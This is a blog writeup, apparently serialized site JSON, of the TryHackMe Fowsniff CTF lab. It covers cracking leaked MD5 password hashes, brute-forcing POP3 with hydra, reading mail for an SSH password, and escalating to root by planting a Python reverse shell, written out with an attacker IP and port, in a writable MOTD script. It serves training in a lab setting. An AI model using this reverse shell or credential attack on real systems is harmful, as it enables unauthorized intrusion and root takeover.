[{"data":1,"prerenderedAt":840},["ShallowReactive",2],{"\u002F2025\u002Ftryhackme-fowsniff-writeup":3,"surround-\u002F2025\u002Ftryhackme-fowsniff-writeup":831},{"_path":4,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":8,"description":9,"date":10,"updated":10,"image":11,"categories":12,"recommend":14,"draft":6,"readingTime":15,"body":20,"_type":824,"_id":825,"_source":826,"_file":827,"_stem":828,"_extension":829,"_original_dir":830},"\u002F2025\u002Ftryhackme-fowsniff-writeup","2025",false,"","TryHackMe - Fowsniff CTF","A full writeup for the TryHackMe Fowsniff CTF. Learn how to go from leaked credentials to root access by cracking MD5 hashes, pivoting from POP3 to SSH, and exploiting a writable MOTD script.","2025-09-02T07:57:20.000Z","https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-fowsniff-writeup\u002Fthumbnail.jpg",[13],"CTF",true,{"text":16,"minutes":17,"time":18,"words":19},"3 min read",2.955,177300,591,{"type":21,"children":22,"toc":817},"root",[23,29,45,52,56,93,123,128,132,146,150,155,159,172,176,188,192,197,283,304,308,312,318,352,356,376,380,416,445,450,479,498,517,521,527,540,544,557,561,573,577,597,601,650,795,807,811],{"type":24,"tag":25,"props":26,"children":28},"element","pic",{"src":27},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-fowsniff-writeup\u002F1.jpg",[],{"type":24,"tag":30,"props":31,"children":32},"p",{},[33,36],{"type":34,"value":35},"text","Target IP: ",{"type":24,"tag":37,"props":38,"children":42},"a",{"href":39,"rel":40},"https:\u002F\u002Ftryhackme.com\u002Froom\u002Fctf",[41],"nofollow",[43],{"type":34,"value":44},"10.10.109.52",{"type":24,"tag":46,"props":47,"children":49},"h2",{"id":48},"reconnaissance",[50],{"type":34,"value":51},"Reconnaissance",{"type":24,"tag":25,"props":53,"children":55},{"src":54},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-fowsniff-writeup\u002F2.jpg",[],{"type":24,"tag":30,"props":57,"children":58},{},[59,61,68,70,76,77,83,85,91],{"type":34,"value":60},"As you can see, our ",{"type":24,"tag":62,"props":63,"children":65},"code",{"className":64},[],[66],{"type":34,"value":67},"ssh",{"type":34,"value":69},", ",{"type":24,"tag":62,"props":71,"children":73},{"className":72},[],[74],{"type":34,"value":75},"http",{"type":34,"value":69},{"type":24,"tag":62,"props":78,"children":80},{"className":79},[],[81],{"type":34,"value":82},"pop3",{"type":34,"value":84},", and ",{"type":24,"tag":62,"props":86,"children":88},{"className":87},[],[89],{"type":34,"value":90},"imap",{"type":34,"value":92}," services are active.",{"type":24,"tag":94,"props":95,"children":96},"ul",{},[97,112],{"type":24,"tag":98,"props":99,"children":100},"li",{},[101,110],{"type":24,"tag":62,"props":102,"children":107},{"className":103,"id":105,"style":106},[104],"example-info","just-like-this","color: #77BEF0",[108],{"type":34,"value":109},"110\u002FTCP Port (POP3)",{"type":34,"value":111},": This protocol allows users to download their emails from the server to their computers.",{"type":24,"tag":98,"props":113,"children":114},{},[115,121],{"type":24,"tag":62,"props":116,"children":118},{"className":117,"id":105,"style":106},[104],[119],{"type":34,"value":120},"143\u002FTCP Port (IMAP)",{"type":34,"value":122},": IMAP is more advanced than POP3 and allows emails to be managed directly on the server (e.g., folder management, deletion).",{"type":24,"tag":30,"props":124,"children":125},{},[126],{"type":34,"value":127},"Now, let's check our web server.",{"type":24,"tag":25,"props":129,"children":131},{"src":130},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-fowsniff-writeup\u002F3.jpg",[],{"type":24,"tag":30,"props":133,"children":134},{},[135,137,144],{"type":34,"value":136},"The site states that employee information has been made public as a result of a data breach. It also mentions that the ",{"type":24,"tag":37,"props":138,"children":141},{"href":139,"rel":140},"https:\u002F\u002Fx.com\u002Ffowsniffcorp",[41],[142],{"type":34,"value":143},"@fowsniffcorp",{"type":34,"value":145}," Twitter account has been compromised.",{"type":24,"tag":25,"props":147,"children":149},{"src":148},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-fowsniff-writeup\u002F4.jpg",[],{"type":24,"tag":30,"props":151,"children":152},{},[153],{"type":34,"value":154},"As you can see, sensitive information has been shared from the compromised Twitter page. (In my case, Pastebin didn't work, so I looked at the exposed data on GitHub.)",{"type":24,"tag":25,"props":156,"children":158},{"src":157},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-fowsniff-writeup\u002F5.jpg",[],{"type":24,"tag":30,"props":160,"children":161},{},[162,164,170],{"type":34,"value":163},"Here we have our usernames and hashed passwords. When we check these hashes, we see that they are hashed with ",{"type":24,"tag":62,"props":165,"children":167},{"className":166},[],[168],{"type":34,"value":169},"MD5",{"type":34,"value":171},".",{"type":24,"tag":25,"props":173,"children":175},{"src":174},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-fowsniff-writeup\u002F6.jpg",[],{"type":24,"tag":30,"props":177,"children":178},{},[179,181,187],{"type":34,"value":180},"Now, let's crack these hashes using ",{"type":24,"tag":37,"props":182,"children":185},{"href":183,"rel":184},"https:\u002F\u002Fcrackstation.net\u002F",[41],[186],{"type":34,"value":183},{"type":34,"value":171},{"type":24,"tag":25,"props":189,"children":191},{"src":190},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-fowsniff-writeup\u002F7.jpg",[],{"type":24,"tag":30,"props":193,"children":194},{},[195],{"type":34,"value":196},"We obtain the following usernames and passwords:",{"type":24,"tag":94,"props":198,"children":199},{},[200,210,219,228,237,246,256,265,274],{"type":24,"tag":98,"props":201,"children":202},{},[203],{"type":24,"tag":62,"props":204,"children":207},{"className":205,"id":105,"style":206},[104],"color: #efb11d",[208],{"type":34,"value":209},"mauer@fowsniff:mailcall",{"type":24,"tag":98,"props":211,"children":212},{},[213],{"type":24,"tag":62,"props":214,"children":216},{"className":215,"id":105,"style":206},[104],[217],{"type":34,"value":218},"mustikka@fowsniff:bilbo101",{"type":24,"tag":98,"props":220,"children":221},{},[222],{"type":24,"tag":62,"props":223,"children":225},{"className":224,"id":105,"style":206},[104],[226],{"type":34,"value":227},"tegel@fowsniff:apples01",{"type":24,"tag":98,"props":229,"children":230},{},[231],{"type":24,"tag":62,"props":232,"children":234},{"className":233,"id":105,"style":206},[104],[235],{"type":34,"value":236},"baksteen@fowsniff:skyler22",{"type":24,"tag":98,"props":238,"children":239},{},[240],{"type":24,"tag":62,"props":241,"children":243},{"className":242,"id":105,"style":206},[104],[244],{"type":34,"value":245},"seina@fowsniff:scoobydoo2",{"type":24,"tag":98,"props":247,"children":248},{},[249],{"type":24,"tag":62,"props":250,"children":253},{"className":251,"id":105,"style":252},[104],"color: #EA5B6F",[254],{"type":34,"value":255},"stone@fowsniff:Not found.",{"type":24,"tag":98,"props":257,"children":258},{},[259],{"type":24,"tag":62,"props":260,"children":262},{"className":261,"id":105,"style":206},[104],[263],{"type":34,"value":264},"mursten@fowsniff:carp4ever",{"type":24,"tag":98,"props":266,"children":267},{},[268],{"type":24,"tag":62,"props":269,"children":271},{"className":270,"id":105,"style":206},[104],[272],{"type":34,"value":273},"parede@fowsniff:orlando12",{"type":24,"tag":98,"props":275,"children":276},{},[277],{"type":24,"tag":62,"props":278,"children":280},{"className":279,"id":105,"style":206},[104],[281],{"type":34,"value":282},"sciana@fowsniff:07011972",{"type":24,"tag":30,"props":284,"children":285},{},[286,288,294,296,302],{"type":34,"value":287},"Now, let's add these to ",{"type":24,"tag":62,"props":289,"children":291},{"className":290},[],[292],{"type":34,"value":293},"users.txt",{"type":34,"value":295}," and ",{"type":24,"tag":62,"props":297,"children":299},{"className":298},[],[300],{"type":34,"value":301},"passwd.txt",{"type":34,"value":303}," files. We will then use them to brute force the mail service (pop3). This will allow us to see the emails of the user we log in as.",{"type":24,"tag":25,"props":305,"children":307},{"src":306},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-fowsniff-writeup\u002F8.jpg",[],{"type":24,"tag":25,"props":309,"children":311},{"src":310},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-fowsniff-writeup\u002F9.jpg",[],{"type":24,"tag":46,"props":313,"children":315},{"id":314},"initial-access",[316],{"type":34,"value":317},"Initial Access",{"type":24,"tag":30,"props":319,"children":320},{},[321,323,330,332,337,338,343,345,350],{"type":34,"value":322},"I will use ",{"type":24,"tag":62,"props":324,"children":327},{"className":325,"id":105,"style":326},[104],"color: #4DFFBE",[328],{"type":34,"value":329},"hydra",{"type":34,"value":331}," for the login attempts. After providing our ",{"type":24,"tag":62,"props":333,"children":335},{"className":334},[],[336],{"type":34,"value":293},{"type":34,"value":295},{"type":24,"tag":62,"props":339,"children":341},{"className":340},[],[342],{"type":34,"value":301},{"type":34,"value":344}," files with the necessary parameters, we specify the protocol to attack as ",{"type":24,"tag":62,"props":346,"children":348},{"className":347},[],[349],{"type":34,"value":82},{"type":34,"value":351}," and then our target server.",{"type":24,"tag":25,"props":353,"children":355},{"src":354},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-fowsniff-writeup\u002F10.jpg",[],{"type":24,"tag":30,"props":357,"children":358},{},[359,361,367,369,374],{"type":34,"value":360},"Hydra did not yield any results. After some trials, we realized we needed to remove the ",{"type":24,"tag":62,"props":362,"children":364},{"className":363,"id":105,"style":252},[104],[365],{"type":34,"value":366},"@fowsniff",{"type":34,"value":368}," part from the usernames. Let's update the ",{"type":24,"tag":62,"props":370,"children":372},{"className":371},[],[373],{"type":34,"value":293},{"type":34,"value":375}," file and try to log in with hydra again.",{"type":24,"tag":25,"props":377,"children":379},{"src":378},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-fowsniff-writeup\u002F11.jpg",[],{"type":24,"tag":30,"props":381,"children":382},{},[383,385,391,393,398,400,406,408,414],{"type":34,"value":384},"And yes, we saw that the pair ",{"type":24,"tag":62,"props":386,"children":388},{"className":387,"id":105,"style":326},[104],[389],{"type":34,"value":390},"seina:scoobydoo2",{"type":34,"value":392}," was able to log in successfully. Now, let's connect to the server's ",{"type":24,"tag":62,"props":394,"children":396},{"className":395},[],[397],{"type":34,"value":82},{"type":34,"value":399}," service, port ",{"type":24,"tag":62,"props":401,"children":403},{"className":402},[],[404],{"type":34,"value":405},"110",{"type":34,"value":407},", with ",{"type":24,"tag":62,"props":409,"children":411},{"className":410},[],[412],{"type":34,"value":413},"nc",{"type":34,"value":415}," and see what we can get.",{"type":24,"tag":94,"props":417,"children":418},{},[419,430],{"type":24,"tag":98,"props":420,"children":421},{},[422,428],{"type":24,"tag":62,"props":423,"children":425},{"className":424,"id":105,"style":106},[104],[426],{"type":34,"value":427},"USER \u003Cusername>",{"type":34,"value":429},": We specify the user to log in.",{"type":24,"tag":98,"props":431,"children":432},{},[433,439,441],{"type":24,"tag":62,"props":434,"children":436},{"className":435,"id":105,"style":106},[104],[437],{"type":34,"value":438},"PASS \u003Cpassword>",{"type":34,"value":440},": We enter the user's password.",{"type":24,"tag":25,"props":442,"children":444},{"src":443},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-fowsniff-writeup\u002F12.jpg",[],{"type":24,"tag":30,"props":446,"children":447},{},[448],{"type":34,"value":449},"Now we will look at the emails on the server with the following commands:",{"type":24,"tag":94,"props":451,"children":452},{},[453,464],{"type":24,"tag":98,"props":454,"children":455},{},[456,462],{"type":24,"tag":62,"props":457,"children":459},{"className":458,"id":105,"style":106},[104],[460],{"type":34,"value":461},"LIST",{"type":34,"value":463},": Lists the number and size of all messages in the mailbox.",{"type":24,"tag":98,"props":465,"children":466},{},[467,473,475],{"type":24,"tag":62,"props":468,"children":470},{"className":469,"id":105,"style":106},[104],[471],{"type":34,"value":472},"RETR \u003Cmail_number>",{"type":34,"value":474},": Displays the content of the email at the specified number.",{"type":24,"tag":25,"props":476,"children":478},{"src":477},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-fowsniff-writeup\u002F13.jpg",[],{"type":24,"tag":30,"props":480,"children":481},{},[482,484,490,492],{"type":34,"value":483},"When we check, we find potential usernames (to whom it was sent) and a temporary SSH password inside email number ",{"type":24,"tag":62,"props":485,"children":487},{"className":486},[],[488],{"type":34,"value":489},"1",{"type":34,"value":491},": ",{"type":24,"tag":62,"props":493,"children":495},{"className":494,"id":105,"style":326},[104],[496],{"type":34,"value":497},"S1ck3nBluff+secureshell",{"type":24,"tag":30,"props":499,"children":500},{},[501,503,508,510,516],{"type":34,"value":502},"After some trials, we were able to log in via ",{"type":24,"tag":62,"props":504,"children":506},{"className":505},[],[507],{"type":34,"value":67},{"type":34,"value":509}," with the pair ",{"type":24,"tag":62,"props":511,"children":513},{"className":512,"id":105,"style":326},[104],[514],{"type":34,"value":515},"baksteen:S1ck3nBluff+secureshell",{"type":34,"value":171},{"type":24,"tag":25,"props":518,"children":520},{"src":519},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-fowsniff-writeup\u002F14.jpg",[],{"type":24,"tag":46,"props":522,"children":524},{"id":523},"privilege-escalation",[525],{"type":34,"value":526},"Privilege Escalation",{"type":24,"tag":30,"props":528,"children":529},{},[530,532,538],{"type":34,"value":531},"Let's upload our ",{"type":24,"tag":62,"props":533,"children":535},{"className":534},[],[536],{"type":34,"value":537},"linpeas.sh",{"type":34,"value":539}," file to the target system and look for possible privilege escalation paths.",{"type":24,"tag":25,"props":541,"children":543},{"src":542},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-fowsniff-writeup\u002F15.jpg",[],{"type":24,"tag":30,"props":545,"children":546},{},[547,549,555],{"type":34,"value":548},"From our output, the ",{"type":24,"tag":62,"props":550,"children":552},{"className":551,"id":105,"style":326},[104],[553],{"type":34,"value":554},"\u002Fopt\u002Fcube\u002Fcube.sh",{"type":34,"value":556}," file catches our attention. We have write permission for this file (because we are in the users group).",{"type":24,"tag":25,"props":558,"children":560},{"src":559},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-fowsniff-writeup\u002F16.jpg",[],{"type":24,"tag":30,"props":562,"children":563},{},[564,566,571],{"type":34,"value":565},"When we check this file, we see that it contains the banner from the beginning of our ",{"type":24,"tag":62,"props":567,"children":569},{"className":568},[],[570],{"type":34,"value":67},{"type":34,"value":572}," session.",{"type":24,"tag":25,"props":574,"children":576},{"src":575},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-fowsniff-writeup\u002F17.jpg",[],{"type":24,"tag":30,"props":578,"children":579},{},[580,582,588,590,595],{"type":34,"value":581},"From this, we understand that the system somehow pulls this file and displays it to us as a banner at the beginning of the session. Normally, the ",{"type":24,"tag":62,"props":583,"children":585},{"className":584,"id":105,"style":326},[104],[586],{"type":34,"value":587},"\u002Fetc\u002Fupdate-motd.d\u002F",{"type":34,"value":589}," directory is used for this purpose. The files in this directory are executed automatically in order. And the scripts in this ",{"type":24,"tag":62,"props":591,"children":593},{"className":592},[],[594],{"type":34,"value":587},{"type":34,"value":596}," directory run with root privileges, not with the privileges of the user logging in. Let's check the scripts in this directory.",{"type":24,"tag":25,"props":598,"children":600},{"src":599},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-fowsniff-writeup\u002F18.jpg",[],{"type":24,"tag":30,"props":602,"children":603},{},[604,606,612,614,619,621,626,628,633,635,640,642,648],{"type":34,"value":605},"And yes, at the very bottom, the command ",{"type":24,"tag":62,"props":607,"children":609},{"className":608,"id":105,"style":206},[104],[610],{"type":34,"value":611},"sh \u002Fopt\u002Fcube\u002Fcube.sh",{"type":34,"value":613}," calls and executes our file. And we know that the scripts in ",{"type":24,"tag":62,"props":615,"children":617},{"className":616},[],[618],{"type":34,"value":587},{"type":34,"value":620}," run with ",{"type":24,"tag":62,"props":622,"children":624},{"className":623},[],[625],{"type":34,"value":21},{"type":34,"value":627}," privileges. So, if we put a reverse shell inside our ",{"type":24,"tag":62,"props":629,"children":631},{"className":630},[],[632],{"type":34,"value":554},{"type":34,"value":634}," script and then close and reopen our ",{"type":24,"tag":62,"props":636,"children":638},{"className":637},[],[639],{"type":34,"value":67},{"type":34,"value":641}," session, the ",{"type":24,"tag":62,"props":643,"children":645},{"className":644,"id":105,"style":326},[104],[646],{"type":34,"value":647},"\u002Fetc\u002Fupdate-motd.d\u002F00-header",{"type":34,"value":649},"  file will run with root privileges, and we should automatically get a shell on our listener. Let's not wait, let's try it:",{"type":24,"tag":651,"props":652,"children":653},"ol",{},[654,667,767,779],{"type":24,"tag":98,"props":655,"children":656},{},[657,659,665],{"type":34,"value":658},"Let's open our script with the ",{"type":24,"tag":62,"props":660,"children":662},{"className":661},[],[663],{"type":34,"value":664},"nano \u002Fopt\u002Fcube\u002Fcube.sh",{"type":34,"value":666}," command and delete everything.",{"type":24,"tag":98,"props":668,"children":669},{},[670,672,679,681],{"type":34,"value":671},"Let's add the following reverse shell to our script. (For various reverse shells, ",{"type":24,"tag":37,"props":673,"children":676},{"href":674,"rel":675},"https:\u002F\u002Fwww.revshells.com\u002F",[41],[677],{"type":34,"value":678},"click here",{"type":34,"value":680},".)",{"type":24,"tag":682,"props":683,"children":687},"pre",{"className":684,"code":685,"language":686,"meta":7,"style":7},"language-bash shiki shiki-themes catppuccin-latte one-dark-pro","export RHOST=\"10.8.13.246\";export RPORT=8080;python3 -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv(\"RHOST\"),int(os.getenv(\"RPORT\"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn(\"bash\")'\n","bash",[688],{"type":24,"tag":62,"props":689,"children":690},{"__ignoreMap":7},[691],{"type":24,"tag":692,"props":693,"children":696},"span",{"class":694,"line":695},"line",1,[697,703,709,715,721,727,731,736,740,746,750,756,762],{"type":24,"tag":692,"props":698,"children":700},{"style":699},"--shiki-default:#8839EF;--shiki-dark:#C678DD",[701],{"type":34,"value":702},"export",{"type":24,"tag":692,"props":704,"children":706},{"style":705},"--shiki-default:#4C4F69;--shiki-dark:#E06C75",[707],{"type":34,"value":708}," RHOST",{"type":24,"tag":692,"props":710,"children":712},{"style":711},"--shiki-default:#179299;--shiki-dark:#56B6C2",[713],{"type":34,"value":714},"=",{"type":24,"tag":692,"props":716,"children":718},{"style":717},"--shiki-default:#40A02B;--shiki-dark:#98C379",[719],{"type":34,"value":720},"\"10.8.13.246\"",{"type":24,"tag":692,"props":722,"children":724},{"style":723},"--shiki-default:#7C7F93;--shiki-dark:#ABB2BF",[725],{"type":34,"value":726},";",{"type":24,"tag":692,"props":728,"children":729},{"style":699},[730],{"type":34,"value":702},{"type":24,"tag":692,"props":732,"children":733},{"style":705},[734],{"type":34,"value":735}," RPORT",{"type":24,"tag":692,"props":737,"children":738},{"style":711},[739],{"type":34,"value":714},{"type":24,"tag":692,"props":741,"children":743},{"style":742},"--shiki-default:#FE640B;--shiki-dark:#D19A66",[744],{"type":34,"value":745},"8080",{"type":24,"tag":692,"props":747,"children":748},{"style":723},[749],{"type":34,"value":726},{"type":24,"tag":692,"props":751,"children":753},{"style":752},"--shiki-default:#1E66F5;--shiki-default-font-style:italic;--shiki-dark:#61AFEF;--shiki-dark-font-style:inherit",[754],{"type":34,"value":755},"python3",{"type":24,"tag":692,"props":757,"children":759},{"style":758},"--shiki-default:#40A02B;--shiki-dark:#D19A66",[760],{"type":34,"value":761}," -c",{"type":24,"tag":692,"props":763,"children":764},{"style":717},[765],{"type":34,"value":766}," 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv(\"RHOST\"),int(os.getenv(\"RPORT\"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn(\"bash\")'\n",{"type":24,"tag":98,"props":768,"children":769},{},[770,772,778],{"type":34,"value":771},"Let's open a listening port on our machine with ",{"type":24,"tag":62,"props":773,"children":775},{"className":774},[],[776],{"type":34,"value":777},"nc -nvlp 8080",{"type":34,"value":171},{"type":24,"tag":98,"props":780,"children":781},{},[782,784,789,791],{"type":34,"value":783},"Let's disconnect the ",{"type":24,"tag":62,"props":785,"children":787},{"className":786},[],[788],{"type":34,"value":67},{"type":34,"value":790}," connection to the target machine and then reconnect.",{"type":24,"tag":25,"props":792,"children":794},{"src":793},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-fowsniff-writeup\u002F19.jpg",[],{"type":24,"tag":30,"props":796,"children":797},{},[798,800,805],{"type":34,"value":799},"Now, when we check our listener, we will see that we have obtained a shell as the ",{"type":24,"tag":62,"props":801,"children":803},{"className":802},[],[804],{"type":34,"value":21},{"type":34,"value":806}," user.",{"type":24,"tag":25,"props":808,"children":810},{"src":809},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Ftryhackme-fowsniff-writeup\u002F20.jpg",[],{"type":24,"tag":812,"props":813,"children":814},"style",{},[815],{"type":34,"value":816},"html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html.dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}",{"title":7,"searchDepth":818,"depth":818,"links":819},4,[820,822,823],{"id":48,"depth":821,"text":51},2,{"id":314,"depth":821,"text":317},{"id":523,"depth":821,"text":526},"markdown","content:posts:2025:tryhackme-fowsniff-writeup.md","content","posts\u002F2025\u002Ftryhackme-fowsniff-writeup.md","posts\u002F2025\u002Ftryhackme-fowsniff-writeup","md","\u002Fposts",[832,836],{"_path":833,"title":834,"date":835},"\u002F2025\u002Ftryhackme-anthem-writeup","TryHackMe - Anthem","2025-09-01T17:37:04.000Z",{"_path":837,"title":838,"date":839},"\u002F2025\u002Ftryhackme-year-of-the-rabbit-writeup","TryHackMe - Year of the Rabbit","2025-09-03T15:56:06.000Z",1776877919312]